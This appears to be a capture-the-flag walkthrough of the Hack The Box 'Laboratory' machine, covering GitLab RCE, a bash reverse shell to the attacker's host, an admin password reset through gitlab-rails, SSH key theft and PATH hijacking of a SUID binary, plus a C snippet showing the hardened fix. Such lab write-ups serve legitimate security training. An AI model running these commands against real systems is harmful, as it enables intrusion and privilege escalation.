Hack The Box - Laboratory Walkthrough without Metasploit

An easy Linux box where we dig into GitLab and gitlab-rails, ending with some PATH hijacking. But first, let's enumerate!

Enumeration

Let's start by running nmapAutomator on our target:

nmapAutomator 10.10.10.216 All

Our basic scan returns the following:

Ports

We have the following ports open:

22

This is the SSH (Secure Shell) port; we might be able to use it later to log in if we find a valid username and password or a valid key.

80

HTTP port that redirects to HTTPS (443). In the Nmap scan we can see that it reveals the hostname laboratory.htb and the subdomain git.laboratory.htb; we add both to our /etc/hosts.

We can also discover the subdomain with gobuster:

gobuster dns -d laboratory.htb -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -t 40

443

This is the HTTPS port, and it's the one we hit when browsing to https://laboratory.htb, so let's see if there's anything interesting:

After some enumeration of the web page we couldn't find much of interest, so let's go to https://git.laboratory.htb. Here we find a GitLab Community Edition instance, and we can Register.

GitLab

We must use an email address on the laboratory domain in order to register successfully:

Once we click Register we are logged in as our new user, evil.

Looking around the site we can enumerate the GitLab version quite easily: we go to Help and it appears:

Searching for possible vulnerabilities on this version we found this report on HackerOne:

That leads us to this git repository:

Let's clone the repository and inspect the Python code!

git clone https://github.com/dotPY-hax/gitlab_RCE

We have to modify the script, since this GitLab restricts email domains, and we also change the port we will be listening on:

We prepare a netcat listener on port 9009:

nc -nvlp 9009

Now we can use the script:

python3 gitlab_rce.py https://git.laboratory.htb <our-ip>

We choose option 2, since we want RCE and our version is 12.8.1. The script will stop and ask us whether we already have a listener (how nice). We can also see what it is doing:

  • Registering user hcbh4toQHD:IWTygssOAM

  • Creating project by8giL18px

  • Creating project qQfLhudoho

  • Creating issue gggHd8VkFn for project by8giL18px

  • Moving issue from by8giL18px to qQfLhudoho

  • Grabbing file secrets.yml

  • Deploying payload

  • Delete user hcbh4toQHD

The shell really is unstable; whenever we press Enter it drops:

As soon as we get in we start another listener, and the first command we type is another reverse shell to make it a bit more stable:

/bin/bash -c 'bash -i >& /dev/tcp/<Our-IP>/<Port> 0>&1'

On our other shell we grab the incoming connection:

We are in as the git user; while enumerating we find out that we are inside a Docker container:

Privilege Escalation

Gitlab-rails

We are inside a container and cannot escape it yet, but we see that gitlab-rails is available (~/gitlab-rails/working). Searching for gitlab-rails we found two interesting pages:

Both links explain how to look up or modify users with the gitlab-rails console.

First we set the environment to production:

gitlab-rails console -e production

Now we can find users by id; we load the first user into the variable user:

user = User.find_by(id: 1)

Let's modify the user a bit:

  • user.password --> set a new password

  • user.password_confirmation --> confirm new password

  • user.save! --> save new configuration

Let's try to log in to GitLab as dexter with our new password, evilpass:

Once we are logged in we can see there are two repositories:

If we open the SecureDocker project we will find an interesting folder:

Inside that folder there is an even more interesting one!

Inside .ssh we have the id_rsa key that will allow us to log in as Dexter.

We copy that id_rsa into a file on our box and chmod 600 it so that ssh will accept it when logging in:

chmod 600 dexterssh
ssh -i dexterssh dexter@10.10.10.216

At this point we can grab the user hash. Once we have it, let's enumerate and try to escalate privileges.

Dexter Privilege Escalation

We transfer suid3num.py to the box to check for SUID binaries:

Start a SimpleHTTPServer on our box (it listens on port 8000 by default):

python -m SimpleHTTPServer

In the Laboratory shell, as dexter, grab the script and execute it:

wget http://<Our-IP>:8000/suid3num.py
chmod +x suid3num.py
python3 suid3num.py

We can see there is a custom SUID binary:

Inspecting the binary with ltrace:

It sets uid and gid to 0 (root) and then calls chmod without its full path; we can hijack that to become root:

Hijacking chmod

Since it calls chmod without the full path, the shell will search every directory in our $PATH variable and use the first chmod it finds. Knowing that, we prepend /tmp/.folder to our PATH and create a file called chmod in that directory containing /bin/bash, then make it executable:

mkdir -p /tmp/.folder && cd /tmp/.folder
export PATH=/tmp/.folder:$PATH
echo "/bin/bash" > chmod
/bin/chmod +x chmod
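As an added illustration (not code from the box or from this write-up), here is the pattern ltrace exposed beside its hardened form: an absolute path, no shell, and a fixed environment, so the caller's PATH is never consulted. The temp file under /tmp, the "/nonexistent" PATH value and the mode 0640 are constructed test inputs.

```c
#define _DEFAULT_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>

/* Pattern the ltrace output exposed: "chmod" is located through the caller's
 * PATH, so whoever controls PATH decides which chmod actually runs. */
int chmod_via_path(const char *mode, const char *file) {
    char cmd[512];
    snprintf(cmd, sizeof cmd, "chmod %s '%s'", mode, file);
    int st = system(cmd);                 /* /bin/sh searches PATH for "chmod" */
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Hardened form: absolute path, direct argv (no shell), fixed environment. */
int chmod_fixed_path(const char *mode, const char *file) {
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "chmod", (char *)mode, (char *)file, NULL };
        execve("/bin/chmod", argv, envp);
        _exit(127);                       /* only reached if execve failed */
    }
    int st;
    if (waitpid(pid, &st, 0) < 0) return -1;
    return WIFEXITED(st) ? WEXITSTATUS(st) : -1;
}

/* Constructed check: point PATH at a directory with no chmod in it (standing
 * in for a manipulated PATH) and run both variants on a temp file. Returns 1
 * when the PATH-dependent call fails (127) while the fixed-path call still
 * applies mode 0640, i.e. when the hardening actually matters. */
int demo(void) {
    char path[] = "/tmp/lab-chmod-XXXXXX";
    int fd = mkstemp(path);               /* created with mode 0600 */
    if (fd < 0) return 0;
    close(fd);
    setenv("PATH", "/nonexistent", 1);
    int rc_path = chmod_via_path("0640", path);
    int rc_fixed = chmod_fixed_path("0640", path);
    struct stat sb;
    int changed = stat(path, &sb) == 0 && (sb.st_mode & 0777) == 0640;
    unlink(path);
    return rc_path == 127 && rc_fixed == 0 && changed;
}

int main(void) { return printf("hardening matters: %s\n", demo() ? "yes" : "no") < 0; }
```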

Pwnd

If we execute the SUID binary now:

/usr/local/bin/docker-security
